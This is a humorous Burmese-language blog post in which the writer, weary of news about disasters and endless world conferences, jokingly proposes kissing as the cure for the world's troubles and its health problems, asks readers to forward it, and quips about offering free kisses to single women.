မားမားမတ္မတ္ ခုခံႏိုင္တဲ႔ ႏိုင္ငံ အေၾကာင္း ကၽြန္ေတာ္မၾကားဖူးဘူး ။ ေရးၾကီးလို႔ မုန္တိုင္းလာလို႔ ငလ်င္လွုပ္လို႔ ဆိုျပီး ပ်က္စီးသြားတဲ႔ သတင္းေတြပဲ အသက္ ၃၀ အထိ ၾကားေနတုန္းပဲ ။ အခုထိ အဲဒိ ေဆြေႏြးပြဲေတြက

မျပီးေသးဘူးလား ။ ဘယ္ေတာ႔ျပီးမွာလဲ ။ မင္းတို႔ေသရင္ေကာ ျပီးမွာလား ။ ကၽြန္ေတာ္ကေတာ႔ ေနပူပူ မိုးရြာရြာ ကမၻာၾကီးပ်က္ပ်က္ ဂရုမစိုက္ပါဘူး ။ ကာကြယ္ဖို႔လည္း မၾကိုးစားပါဘူး ။ လူေတြ လုပ္ႏိုင္တဲ႔အရာ မဟုတ္ဘူးလို႔ ယူဆတယ္ ။

အသက္ရွင္ခ်ိန္ ခဏ နဲ႔ ဒီစိတ္ေလး တစ္ခုကိုပဲ ကၽြန္ေတာ္ တန္ဖိုးထားတယ္ ။

ဘုရားက ခ်စ္ခ်စ္ခင္ခင္ေနၾကလို႔ ဆံုးမတယ္ ။ လူေတြက နားမေထာင္ဘူး ။ အမုန္းဆံုးလက္နက္နဲ႔ အမုန္းစစ္တိုက္ၾကမယ္တဲ႔ ။ ငါဟာ ဒီကမၻာၾကီး အတြက္ ေျဖေဆးတစ္ခုေပးတယ္ ။ မင္းတို႕ ေသနက္ေတြ ေဘးခ်ျပီး

တစ္ေယာက္ကို တစ္ေယာက္ဖမ္နမ္းၾကေတာ႔ ။ ဘာအစည္းေ၀း ညာအစည္းေ၀း လုပ္မေနပါနဲ႔ ၊ ေတြ႔တဲ႔လူကို ဖက္သာနမ္းပစ္ ။ မင္းတို႔ ခ်စ္တဲ႔သူကို ေဘးမွာထားျပီး ၾကင္ၾကင္နာနာ နမ္းေနၾကပါ ကမၻာၾကီး ေအးခ်မ္းသြားပါလိမ္႔မယ္ ။

ဒီအနမ္းအေၾကာင္းကို လူေတြ ၾကယ္ၾကယ္ျပန္႔ျပန္႔ သိဖို႔လိုအပ္တယ္ ။ အနမ္းမွာ ဆိုးက်ိဳးရယ္လို႔ ဘာမွမရွိဘူး ။ အနမ္းဟာ လူေတြရဲ႕ က်န္းမာေရး ၊ ႏွလံုး ၊ အဆုတ္ ၊ စိတ္ဖိစီးမွု ၊ ေသြးတိုး ၊ အသက္ရွည္ျခင္း ၊ ႏုပ်ိဳလွပျခင္း

ေပ်ာ္ရႊင္ျခင္း အားလံုးနဲ႔ ပတ္သက္ေနတယ္ ။ အနမ္းဟာ အထူးျပဳေလ႔လာရမယ္႔ ဘာသာတစ္ခုျဖစ္တယ္ ။ အနမ္းအေၾကာင္းလူေတြ သိရွိေအာင္ ဒီစာကို forward လုပ္ေပးပါ ။

ကၽြန္ေတာ္႔ သူငယ္ခ်င္းေတြထဲမွာ ႏွလံုးမေကာင္းတဲ႔သူ ၊ ေသြးတိုးတက္တဲ႔သူ ၊ စိတ္ဖိစီးမွုမ်ားတဲ႔သူ ေတြရွိၾကပါတယ္ ။ သူတို႔ကို ကၽြန္ေတာ္ ဒီစာ ဖတ္ေစခ်င္ပါတယ္ ။ သူငယ္ခ်င္းေတြလဲ နမ္းသင္႔တယ္လို႔ ကၽြန္ေတာ္ ယူဆတယ္ ။

ပိုခင္တဲ႔သူကို ပိုနမ္းေပါ႔ေလ ။ အနမ္းအေၾကာင္းသိခ်င္တဲ႔ ခ်စ္သူမရွိတဲ႕ ေကာင္မေလးေတြကို ကၽြန္ေတာ္ volunteer အေနနဲ႔ အခမဲ႔ ၀န္ေဆာင္မွုေပးရင္ ေကာင္းမလားလို႔ စဥ္းစားေနပါတယ္ ။

ေခ်ာေခ်ာလွလွ ေကာင္မေလးေတြကို ကၽြန္ေတာ္ အရမ္း နမ္းခ်င္ပါတယ္ အ .. ဟီး … ။

ဒီကမၻာကို ျပဳျပင္ေျပာင္းလဲပစ္မယ္လို႔ ေအာ္ဟစ္မေနပါနဲ႔ ငါေျပာတဲ႔အတိုင္းပဲ မင္းလုပ္စမ္းပါ ။